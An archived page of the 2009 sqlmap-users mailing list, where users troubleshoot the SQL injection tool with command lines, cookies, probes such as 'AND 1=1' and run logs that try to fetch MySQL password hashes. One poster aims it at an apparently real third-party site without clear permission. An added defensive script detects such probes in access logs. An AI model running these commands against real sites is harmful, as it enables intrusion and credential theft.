sqlmap-users Mailing List for sqlmap (Page 135)
From: Adi M. <adi...@ya...> - 2009-10-13 04:33:02
back, It was my mistake, I was modifying the log file incorrectly. But now I have solved it by taking as a model another log file where sqlmap detected correctly. However there is another problem now. Although sqlmap detects correctly, when I run some commands it says:

[10:17:59] [INFO] fetching tables
[10:17:59] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind
[10:17:59] [INFO] fetching database names
[10:18:00] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind

________________________________
From: Adi Mutu <adi...@ya...>
To: sql...@li...
Sent: Tue, October 13, 2009 7:02:22 AM
Subject: [sqlmap-users] problem detecting the union count

Hello,

Sqlmap fails to detect the no. of columns to use in a union. My guess is that this happens because the input variable is used in a second query, which echoes an error back in the html output. Thus I think sqlmap tries something like Union 12345 # , sees the 12345 echoed back and stops. Is this the behaviour?

Then I tried to modify the log file like this:

[http://www.xxxx.com:80/podcast-detail.php][None][None][Match ratio][0.9]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][Injection point][GET]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][Injection parameter][id]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][Injection type][numeric]
[http://www.xxx.com:80/podcast-detail.php][GET][id=3][Parenthesis][0]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][SELECT 12345,222,333,444,555 FROM information_schema.TABLES LIMIT 0, 1][12345]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][DBMS][MySQL 5]
[http://www.xxx.com:80/podcast-detail.php][GET][id=3][Union comment][#]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][Union count][5]

As you can see there are 5 columns in the query and the output should be in the first column. Did I modify it correctly? And also when I try to resume from this file with -s option it goes back to the old behaviour, which uses 1 column for union, not 5 as I have tried to tell it to do.

Thank you!

From: Adi M. <adi...@ya...> - 2009-10-13 04:02:34
Hello,

Sqlmap fails to detect the no. of columns to use in a union. My guess is that this happens because the input variable is used in a second query, which echoes an error back in the html output. Thus I think sqlmap tries something like Union 12345 # , sees the 12345 echoed back and stops. Is this the behaviour?

Then I tried to modify the log file like this:

[http://www.xxxx.com:80/podcast-detail.php][None][None][Match ratio][0.9]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][Injection point][GET]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][Injection parameter][id]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][Injection type][numeric]
[http://www.xxx.com:80/podcast-detail.php][GET][id=3][Parenthesis][0]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][SELECT 12345,222,333,444,555 FROM information_schema.TABLES LIMIT 0, 1][12345]
[http://www.xxxx.com:80/podcast-detail.php][GET][id=3][DBMS][MySQL 5]
[http://www.xxx.com:80/podcast-detail.php][GET][id=3][Union comment][#]
[http://www.xxxxx.com:80/podcast-detail.php][GET][id=3][Union count][5]

As you can see there are 5 columns in the query and the output should be in the first column. Did I modify it correctly? And also when I try to resume from this file with -s option it goes back to the old behaviour, which uses 1 column for union, not 5 as I have tried to tell it to do.

Thank you!

From: Windom E. <win...@ma...> - 2009-10-07 13:52:39
While doing cookie parameter injection for "--dump-all" option...

Error log:

there were multiple injection points, please select the one to use to go ahead:
[0] place: User-Agent, parameter: User-Agent, type: numeric (default)
[1] place: Cookie, parameter: sessiondata, type: numeric
[q] Quit
> 1
[17:35:50] [INFO] testing for parenthesis on injectable parameter
[17:36:51] [INFO] the injectable parameter requires 3 parenthesis
[17:36:52] [INFO] testing MySQL
[17:37:12] [WARNING] the back-end DMBS is not MySQL
[17:37:12] [INFO] testing Oracle
[17:37:32] [WARNING] the back-end DMBS is not Oracle
[17:37:32] [INFO] testing PostgreSQL
[17:37:54] [WARNING] the back-end DMBS is not PostgreSQL
[17:37:54] [INFO] testing Microsoft SQL Server
[17:38:17] [INFO] confirming Microsoft SQL Server
[17:38:40] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: Microsoft SQL Server 2000
[17:38:40] [INFO] fetching tables
[17:38:40] [INFO] fetching database names
[17:38:40] [INFO] fetching number of databases
[17:38:40] [INFO] retrieved:
[17:38:40] [ERROR] unhandled exception in sqlmap/0.7, please copy the command line and the following text and send by e-mail to sqlmap...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.7
Python version: 2.6.1
Operating system: win32
Traceback (most recent call last):
  File "sqlmap.py", line 84, in main
  File "lib\controller\controller.pyc", line 263, in start
  File "lib\controller\action.pyc", line 120, in action
  File "plugins\generic\enumeration.pyc", line 1081, in dumpAll
  File "plugins\dbms\mssqlserver.pyc", line 337, in getTables
  File "plugins\generic\enumeration.pyc", line 661, in getDbs
  File "lib\request\inject.pyc", line 378, in getValue
  File "lib\request\inject.pyc", line 308, in __goInferenceProxy
  File "lib\request\inject.pyc", line 99, in __goInferenceFields
  File "lib\request\inject.pyc", line 58, in __goInference
  File "lib\techniques\blind\inference.pyc", line 232, in bisection
  File "lib\techniques\blind\inference.pyc", line 105, in getChar
TypeError: not all arguments converted during string formatting

From: Bernardo D. A. G. <ber...@gm...> - 2009-10-05 08:20:02
It seems that the user 'fmcgman' does not have access to read the 'mysql' system database.

On Mon, Oct 5, 2009 at 06:59, Adi Mutu <adi...@ya...> wrote:
>
> This is the output I got:
>
> [08:54:02] [INFO] resuming match ratio '0.9' from session file
> [08:54:02] [INFO] resuming injection point 'GET' from session file
> [08:54:02] [INFO] resuming injection parameter 'id' from session file
> [08:54:02] [INFO] resuming injection type 'numeric' from session file
> [08:54:02] [INFO] resuming 0 number of parenthesis from session file
> [08:54:02] [INFO] resuming back-end DBMS 'mysql 5' from session file
> [08:54:02] [INFO] resuming union comment '#' from session file
> [08:54:02] [INFO] resuming union count 9 from session file
> [08:54:02] [INFO] resuming union position 4 from session file
> [08:54:02] [INFO] testing connection to the target url
> [08:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie
> [08:54:02] [INFO] testing for parenthesis on injectable parameter
> [08:54:02] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Red Hat
> web application technology: Apache 2.2.3, PHP 5.1.6
> back-end DBMS: MySQL 5
> [08:54:02] [INFO] fetching database users password hashes
> [08:54:03] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going bli
> [08:54:03] [INFO] fetching database users
> [08:54:03] [INFO] read from file 'logs/fmc.log': 'fmcgman'@'localhost'
> [08:54:03] [INFO] fetching number of password hashes for user '''
> [08:54:03] [ERROR] Unenclosed ' in 'SELECT IFNULL(CAST(COUNT(DISTINCT(password)) AS CHAR(10000)), CHAR(32)) FROM mysql.user WHERE user=CHAR()''
> [*] shutting down at: 08:54:03

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

From: Adi M. <adi...@ya...> - 2009-10-05 05:59:27
This is the output I got:

[08:54:02] [INFO] resuming match ratio '0.9' from session file
[08:54:02] [INFO] resuming injection point 'GET' from session file
[08:54:02] [INFO] resuming injection parameter 'id' from session file
[08:54:02] [INFO] resuming injection type 'numeric' from session file
[08:54:02] [INFO] resuming 0 number of parenthesis from session file
[08:54:02] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:54:02] [INFO] resuming union comment '#' from session file
[08:54:02] [INFO] resuming union count 9 from session file
[08:54:02] [INFO] resuming union position 4 from session file
[08:54:02] [INFO] testing connection to the target url
[08:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[08:54:02] [INFO] testing for parenthesis on injectable parameter
[08:54:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
[08:54:02] [INFO] fetching database users password hashes
[08:54:03] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going bli
[08:54:03] [INFO] fetching database users
[08:54:03] [INFO] read from file 'logs/fmc.log': 'fmcgman'@'localhost'
[08:54:03] [INFO] fetching number of password hashes for user '''
[08:54:03] [ERROR] Unenclosed ' in 'SELECT IFNULL(CAST(COUNT(DISTINCT(password)) AS CHAR(10000)), CHAR(32)) FROM mysql.user WHERE user=CHAR()''
[*] shutting down at: 08:54:03

From: Kyle A. <ky...@xk...> - 2009-10-03 19:43:05
So it seems that you cannot do a --dump-all on a mysql 4 server because information_schema is not available. But can't I just do a "show databases;" in a sql shell? I tried but I can't seem to get the sql-shell to work (probably because it says I'm not a DBA)

Can someone explain a little more about this? (Or link me)

Kyle

From: Bernardo D. A. G. <ber...@gm...> - 2009-09-25 23:18:27
Hi,

On Tuesday I came back from Barcelona (Spain) where I gave a talk[1] with my friend Guido Landi[2] at SOURCE Conference 2009[3], met some very smart people, had good chats, fun times too and ate amazing Spanish tapas with tasty local red wine!

Thanks SOURCE Barcelona 2009 team[4] for organizing such a great event and giving me the opportunity to come over!

My presentation slides are online[5] on Slideshare. You can also read them below.

I also released sqlmap 0.8 release candidate 1 with all of the new features described during my presentation at the Conference. You can also checkout the source code from the sqlmap Subversion repository:

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ sqlmap

[1] http://bernardodamele.blogspot.com/2009/09/source-barcelona-2009.html
[2] http://www.pornosecurity.org/
[3] http://www.sourceconference.com/index.php/source-barcelona-2009
[4] http://www.sourceconference.com/index.php/source-barcelona-2009/barc-2009-team
[5] http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database

Cheers,
--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

From: Erik N. <da...@gm...> - 2009-09-17 17:34:39
Thank you for your answer, unfortunately it didn't help me. I tried to force the back-end dbms into a number of different variations. I also double checked that the string isn't present when using AND 1=2. Using --fingerprint gave me no output as well. This is what I got from that run:

[19:28:54] [WARNING] the testable parameter 'id' you provided is not into the Cookie
[19:28:54] [INFO] testing connection to the target url
[19:28:58] [INFO] testing if the provided string is within the target URL page content
[19:28:59] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[19:28:59] [INFO] testing unescaped numeric injection on GET parameter 'id'
[19:29:03] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[19:29:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[19:29:04] [INFO] testing for parenthesis on injectable parameter
[19:29:07] [INFO] the injectable parameter requires 0 parenthesis
[19:29:07] [INFO] the back-end DBMS is MySQL
[19:29:07] [INFO] testing MySQL
[19:29:13] [INFO] confirming MySQL
[19:29:17] [INFO] retrieved:
[19:29:25] [INFO] the back-end DBMS is MySQL
[19:29:25] [INFO] retrieved:
[19:29:34] [INFO] retrieved:
[19:29:43] [INFO] retrieved:
[19:29:49] [INFO] retrieved:
[19:29:59] [INFO] retrieved:
[19:30:06] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
comment injection fingerprint: MySQL 5.0.75
[*] shutting down at: 19:32:09

On Thu, Sep 17, 2009 at 6:52 PM, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi Erik,
>
> Try to force the back-end database software and version manually if
> you know it, e.g. --dbms "mysql 5" and double check that the provided
> string to match on is not present within any False response (eg. AND
> 1=2).
>
> Cheers,
> Bernardo
>
>
> On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote:
>> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
>> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
>> __utmb=107765125.29.10.1252406202; __utmc=107765125;
>> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
>> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
>> --string="Secret Forum" --fingerprint
>>
>> [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
>> [14:09:04] [INFO] testing for parenthesis on injectable parameter
>> [14:09:06] [INFO] the injectable parameter requires 0 parenthesis
>> [14:09:06] [INFO] testing MySQL
>> [14:09:07] [INFO] confirming MySQL
>> [14:09:08] [INFO] retrieved:
>> [14:09:10] [INFO] the back-end DBMS is MySQL
>> [14:09:10] [INFO] retrieved:
>> [14:11:28] [INFO] retrieved:
>> [14:11:32] [INFO] retrieved:
>> [14:11:35] [INFO] retrieved:
>> [14:11:41] [INFO] retrieved:
>> [14:11:46] [INFO] executing MySQL comment injection fingerprint
>> web server operating system: Linux Ubuntu
>> web application technology: PHP 5.2.6, Apache
>> back-end DBMS: active fingerprint: MySQL < 3.22.11
>> comment injection fingerprint: MySQL 5.0.75
>>
>>
>> [*] shutting down at: 14:12:50
>>
>>
>> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
>> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
>> __utmb=107765125.29.10.1252406202; __utmc=107765125;
>> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
>> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
>> --string="Secret Forum" --current-db
>>
>> [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
>> [14:14:01] [INFO] testing for parenthesis on injectable parameter
>> [14:14:03] [INFO] the injectable parameter requires 0 parenthesis
>> [14:14:03] [INFO] testing MySQL
>> [14:14:04] [INFO] confirming MySQL
>> [14:14:05] [INFO] retrieved:
>> [14:14:07] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: PHP 5.2.6, Apache
>> back-end DBMS: MySQL < 5.0.0
>>
>> [14:14:07] [INFO] fetching current database
>> [14:14:07] [INFO] retrieved:
>> current database: None
>>
>>
>> What to do?
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F

From: Bernardo D. A. G. <ber...@gm...> - 2009-09-17 16:54:12
Hi Tristan,

I said AND 1=1 and AND 1=2. sqlmap does this test. It does not do AND 1 nor AND 0.
By the way, the detection phase in sqlmap is in the process of being totally rewritten because at this time it misses many cases.

Cheers,
Bernardo

On Thu, Sep 17, 2009 at 17:49, Tristan Foureur <tri...@gm...> wrote:
> Hi bernardo,
>
> Thanks for your reply,
>
> Yes, I'm allowed to test this website. Hmm... I don't understand that such a
> complex program doesn't find this parameter vulnerable, cause it DOES work
> with AND 1 and it DOESN'T work with AND 0.
>
> I will also try to use the --string option.

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

From: Bernardo D. A. G. <ber...@gm...> - 2009-09-17 16:52:16
Hi Erik,

Try to force the back-end database software and version manually if you know it, e.g. --dbms "mysql 5" and double check that the provided string to match on is not present within any False response (eg. AND 1=2).

Cheers,
Bernardo

On Tue, Sep 8, 2009 at 13:21, Erik Nilsson <da...@gm...> wrote:
> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
> __utmb=107765125.29.10.1252406202; __utmc=107765125;
> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
> --string="Secret Forum" --fingerprint
>
> [14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
> [14:09:04] [INFO] testing for parenthesis on injectable parameter
> [14:09:06] [INFO] the injectable parameter requires 0 parenthesis
> [14:09:06] [INFO] testing MySQL
> [14:09:07] [INFO] confirming MySQL
> [14:09:08] [INFO] retrieved:
> [14:09:10] [INFO] the back-end DBMS is MySQL
> [14:09:10] [INFO] retrieved:
> [14:11:28] [INFO] retrieved:
> [14:11:32] [INFO] retrieved:
> [14:11:35] [INFO] retrieved:
> [14:11:41] [INFO] retrieved:
> [14:11:46] [INFO] executing MySQL comment injection fingerprint
> web server operating system: Linux Ubuntu
> web application technology: PHP 5.2.6, Apache
> back-end DBMS: active fingerprint: MySQL < 3.22.11
> comment injection fingerprint: MySQL 5.0.75
>
>
> [*] shutting down at: 14:12:50
>
>
> sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
> __utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
> __utmb=107765125.29.10.1252406202; __utmc=107765125;
> PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
> --url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
> --string="Secret Forum" --current-db
>
> [14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
> [14:14:01] [INFO] testing for parenthesis on injectable parameter
> [14:14:03] [INFO] the injectable parameter requires 0 parenthesis
> [14:14:03] [INFO] testing MySQL
> [14:14:04] [INFO] confirming MySQL
> [14:14:05] [INFO] retrieved:
> [14:14:07] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Ubuntu
> web application technology: PHP 5.2.6, Apache
> back-end DBMS: MySQL < 5.0.0
>
> [14:14:07] [INFO] fetching current database
> [14:14:07] [INFO] retrieved:
> current database: None
>
>
> What to do?

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

From: Bernardo D. A. G. <ber...@gm...> - 2009-09-17 16:44:20
Hi Tristan,

First of all, are you allowed to test that url?

If you are, could you please try manually by injecting AND 3=3 to the news_id parameter first and AND 3=4 later and see if the result is as expected.
During the detection phase, sqlmap tries to identify injectable parameters only via AND, never via OR, for a few reasons highlighted some months back on this mailing list. This is the reason why, for the moment, sqlmap does not detect zone_id as an injectable parameter.
Also, try to provide to sqlmap a string (--string option) or a regular expression (Python compliant) to match on, refer to the user's manual for details.

Cheers,
Bernardo

On Thu, Sep 17, 2009 at 17:04, Tristan Foureur <tri...@gm...> wrote:
> ...
> It says that both news_id and zone_id aren't injectables ! I tried using the
> -p parameter like that : -p zone_id but it doesn't change anything.
>
> I don't think that sqlmap can't detect such basic injections, so could you
> tell me what is the proper parameters to detect something simple like that,
> and then how to exploit it ?

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

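Added example (not part of the thread, and not sqlmap's own code): from the defender's side, the AND true/false pair that the replies above describe shows up in web server access logs as two requests from one client against the same parameter. The script below pairs them up and records whether the response size changed between the true and the false condition; the log lines, addresses and the `/news.php` path are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format); not taken from the thread.
SAMPLE_LOG = """\
198.51.100.7 - - [17/Sep/2009:16:40:01 +0000] "GET /news.php?news_id=270&zone_id=4 HTTP/1.1" 200 5120
198.51.100.7 - - [17/Sep/2009:16:40:02 +0000] "GET /news.php?news_id=270%20AND%203%3D3&zone_id=4 HTTP/1.1" 200 5120
198.51.100.7 - - [17/Sep/2009:16:40:03 +0000] "GET /news.php?news_id=270%20AND%203%3D4&zone_id=4 HTTP/1.1" 200 812
203.0.113.9 - - [17/Sep/2009:16:41:10 +0000] "GET /search.php?q=salt+and+pepper HTTP/1.1" 200 2048
203.0.113.20 - - [17/Sep/2009:16:42:30 +0000] "GET /news.php?news_id=271+AND+1=1&zone_id=4 HTTP/1.1" 200 4990
"""

# client, request target and response size from one log line
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# "AND <n>=<m>" appended to a parameter value, optionally quoted or parenthesised
BOOL_PROBE = re.compile(r"\bAND\s+\(*\s*'?(\d+)'?\s*=\s*'?(\d+)", re.IGNORECASE)


def classify(value):
    """Return 'true' or 'false' for an AND n=m probe in a decoded value, else None."""
    match = BOOL_PROBE.search(value)
    if not match:
        return None
    return "true" if int(match.group(1)) == int(match.group(2)) else "false"


def find_boolean_probe_pairs(log_text):
    """Report (client, path, parameter) triples that received both a true and a
    false AND condition, and whether the response sizes differed between them."""
    seen = defaultdict(lambda: {"true": set(), "false": set()})
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue  # not a request line we understand
        url = urlsplit(match.group("target"))
        size = 0 if match.group("size") == "-" else int(match.group("size"))
        # parse_qsl percent-decodes values and turns '+' into a space
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                seen[(match.group("client"), url.path, name)][kind].add(size)

    findings = []
    for (client, path, name), sizes in sorted(seen.items()):
        if sizes["true"] and sizes["false"]:
            findings.append({
                "client": client,
                "path": path,
                "parameter": name,
                # a different page for true vs. false means the condition
                # reached the query, so this parameter needs fixing first
                "response_differs": sizes["true"].isdisjoint(sizes["false"]),
            })
    return findings


if __name__ == "__main__":
    for finding in find_boolean_probe_pairs(SAMPLE_LOG):
        print(finding)
```

A lone true condition (the last sample line) or an ordinary search containing the word "and" is not reported; only a completed true/false pair against one parameter is.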
From: Kyle A. <ky...@xk...> - 2009-09-17 16:38:46
He may be busted :)

But this seems like a bug report really. And how can one allow a developer to reproduce the bug without providing steps to reproduce it? I also can't get sqlmap to identify any injectable variables.

Kyle

On 9/17/09, Erik Nilsson <da...@gm...> wrote:
> LOL!
>
> On Thu, Sep 17, 2009 at 6:10 PM, Ryan Dewhurst <rya...@gm...> wrote:
>> Busted!
>>
>> 2009/9/17 Patrick Webster <pa...@au...>:
>>> It is probably not a good idea to attack http://www.siig.fr
>>>
>>> -Patrick
>>>
>>> On Fri, Sep 18, 2009 at 2:04 AM, Tristan Foureur <tri...@gm...> wrote:
>>>>
>>>> Hello,
>>>>
>>>> I don't know why but a really really basic injection is not detected. The
>>>> URL is like www.host.com?news_id=270&zone_id=4 and when I'm doing
>>>>
>>>> www.host.com?news_id=270&zone_id=4 OR 1 it displays every news, when I'm
>>>> doing news_id=270 AND 0 it displays no news. When I'm doing news_id=270
>>>> THISISATEST it displays a mysql error.
>>>>
>>>> So it's definitely injectable and that's not a "rare" type of injection.
>>>>
>>>> Now I would like to learn to use sqlmap to find these injections and how
>>>> to use it but when I'm doing this :
>>>>
>>>> sqlmap.exe -u "http://www.siig.fr/fr/consnews2.php?news_id=270&zone_id=4" -v 1
>>>>
>>>> It says that both news_id and zone_id aren't injectables ! I tried using
>>>> the -p parameter like that : -p zone_id but it doesn't change anything.
>>>>
>>>> I don't think that sqlmap can't detect such basic injections, so could you
>>>> tell me what is the proper parameters to detect something simple like that,
>>>> and then how to exploit it ?
>>>>
>>>> Thanks :)

From: Tristan F. <tri...@gm...> - 2009-09-17 16:25:56
Hello,

I don't know why but a really really basic injection is not detected. The URL is like www.host.com?news_id=270&zone_id=4 and when I'm doing

www.host.com?news_id=270&zone_id=4 OR 1 it displays every news, when I'm doing news_id=270 AND 0 it displays no news. When I'm doing news_id=270 THISISATEST it displays a mysql error.

So it's definitely injectable and that's not a "rare" type of injection.

Now I would like to learn to use sqlmap to find these injections and how to use it but when I'm doing this :

sqlmap.exe -u "http://www.host.com/news.php?news_id=270&zone_id=4" -v 1

It says that both news_id and zone_id aren't injectable ! I tried using the -p parameter like that : -p zone_id but it doesn't change anything.

I don't think that sqlmap can't detect such basic injections, so could you tell me what are the proper parameters to detect something simple like that ?

Thanks :)

From: Kyle A. <ky...@xk...> - 2009-09-17 16:18:35
I don't really want to spoil this challenge for you, I enjoy hackthissite.org and I hate spoilers. But the URL you are attacking is incorrect, connexion.php doesn't accept post data at all. Look carefully at the source. Also look again at the variables you are passing, one of them is not correct.

Also, this tool may not work on a hacking site, if it is anything like hackthissite.org. The reason is that for safety purposes, the site may be hardcoded to only accept the official "response" and won't respond like a normal php/mysql site. Does this make any sense? In other words, the php page may just be parsing for correct looking responses, not really a database behind it?

I tried injecting it with the correct url and correct variables and it didn't respond, I don't believe that a real mysql server is behind it.

Kyle

On 9/16/09, Adrien LEMAIRE <lem...@gm...> wrote:
> your example was user and password. I've looked into tamper data and have
> seen that variables were user and pass. So what do you think about it ?
>
> Thank you a lot for your help, Erik !
>
> On Wed, Sep 16, 2009 at 2:10 PM, Erik Nilsson <da...@gm...> wrote:
>
>> This was just an example of variables to use. You have to identify the
>> variables by your own for each url.
>> A good tool for this is the "Tamper data" plug in for Firefox.
>>
>> ---------- Forwarded message ----------
>> From: Adrien LEMAIRE <lem...@gm...>
>> Date: Wed, Sep 16, 2009 at 1:52 PM
>> Subject: Re: [sqlmap-users] Fwd: sqlmap stop after testing User-Agent
>> To: Erik Nilsson <da...@gm...>
>> Cc: sql...@li...
>>
>> Ok, I have already tried with --data option, but I've put
>> "user=user;pass=pass" instead of "user=user&pass=pass", mistake.
>>
>> So I've retried and the output is :
>>
>> > $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&pass=password"
>> >
>> > sqlmap/0.7
>> > by Bernardo Damele A. G. <ber...@gm...>
>> >
>> > [*] starting at: 13:43:07
>> >
>> > [13:43:07] [INFO] testing connection to the target url
>> > [13:43:07] [INFO] testing if the url is stable, wait a few seconds
>> > [13:43:08] [INFO] url is stable
>> > [13:43:08] [INFO] testing if POST parameter 'user' is dynamic
>> > [13:43:08] [WARNING] POST parameter 'user' is not dynamic
>> > [13:43:08] [INFO] testing if POST parameter 'pass' is dynamic
>> > [13:43:08] [WARNING] POST parameter 'pass' is not dynamic
>> > [13:43:08] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
>> > [13:43:08] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>> >
>> > [*] shutting down at: 13:43:08
>>
>> So I suppose that there is no injection vulnerability, and I should
>> use another tool ?
>>
>> On Wed, Sep 16, 2009 at 1:37 PM, Erik Nilsson <da...@gm...> wrote:
>> >
>> > You'll need to enter GET and/or POST values like
>> >
>> > sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1 --data="user=user&password=password"
>> >
>> > OR
>> >
>> > sqlmap-0.7 $ python sqlmap.py --url="http://invest.infomirmo.fr/webdesigner/connexion.php?user=user&data=data"
>> >
>> > ---------- Forwarded message ----------
>> > From: Adrien LEMAIRE <lem...@gm...>
>> > Date: Wed, Sep 16, 2009 at 11:35 AM
>> > Subject: [sqlmap-users] sqlmap stop after testing User-Agent
>> > To: sql...@li...
>> >
>> > Hi everyone,
>> >
>> > I'm new to this list mail :)
>> > I want to learn how to use sqlmap. I've installed sqlmap on my ubuntu,
>> > and tried to launch it :
>> >
>> > > sqlmap-0.7 $ python sqlmap.py -u http://invest.infomirmo.fr/webdesigner/connexion.php -v 1
>> > >
>> > > sqlmap/0.7
>> > > by Bernardo Damele A. G. <ber...@gm...>
>> > >
>> > > [*] starting at: 11:13:17
>> > >
>> > > [11:13:17] [INFO] testing connection to the target url
>> > > [11:13:17] [INFO] testing if the url is stable, wait a few seconds
>> > > [11:13:19] [INFO] url is stable
>> > > [11:13:19] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
>> > > [11:13:19] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>> > >
>> > > [*] shutting down at: 11:13:19
>> >
>> > This website is a French site for hacking challenges, and I wanted to
>> > try if sqlmap couldn't bruteforce the login/password.
>> > But I thought that sqlmap will also test for GET, POST and Cookie
>> > before shutting down if nothing is dynamic.
>> >
>> > Reference to user manual :
>> > >
>> > > Let's say that you are auditing a web application and found a web page that accepts dynamic user-provided values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent header value.
>> >
>> > Did I misunderstand something ? Do you think I forgot to configure
>> > something in sqlmap config files ? (I haven't modified any file yet).
>> >
>> > Thank you a lot for your answer, and sorry for disturb..
>> > Best regards,
>> > Adrien Lemaire
From: Erik N. <da...@gm...> - 2009-09-17 16:16:14
|
LOL!

On Thu, Sep 17, 2009 at 6:10 PM, Ryan Dewhurst <rya...@gm...> wrote:
> Busted!
>
> 2009/9/17 Patrick Webster <pa...@au...>:
>> It is probably not a good idea to attack http://www.siig.fr
>>
>> -Patrick
>>
>> On Fri, Sep 18, 2009 at 2:04 AM, Tristan Foureur <tri...@gm...>
>> wrote:
>>>
>>> Hello,
>>>
>>> I don't know why but a really really basic injection is not detected. The
>>> URL is like www.host.com?news_id=270&zone_id=4 and when I'm doing
>>>
>>> www.host.com?news_id=270&zone_id=4 OR 1 it displays every news, when I'm
>>> doing news_id=270 AND 0 it displays no news. When I'm doing news_id=270
>>> THISISATEST it displays a mysql error.
>>>
>>> So it's definitely injectable and that's not a "rare" type of injection.
>>>
>>> Now I would like to learn to use sqlmap to find these injections and how
>>> to use it but when I'm doing this :
>>>
>>> sqlmap.exe -u "http://www.siig.fr/fr/consnews2.php?news_id=270&zone_id=4" -v 1
>>>
>>> It says that both news_id and zone_id aren't injectable ! I tried using
>>> the -p parameter like that : -p zone_id but it doesn't change anything.
>>>
>>> I don't think that sqlmap can't detect such basic injections, so could you
>>> tell me what are the proper parameters to detect something simple like that,
>>> and then how to exploit it ?
>>>
>>> Thanks :) |
From: Ryan D. <rya...@gm...> - 2009-09-17 16:10:16
|
Busted!

2009/9/17 Patrick Webster <pa...@au...>:
> It is probably not a good idea to attack http://www.siig.fr
>
> -Patrick
>
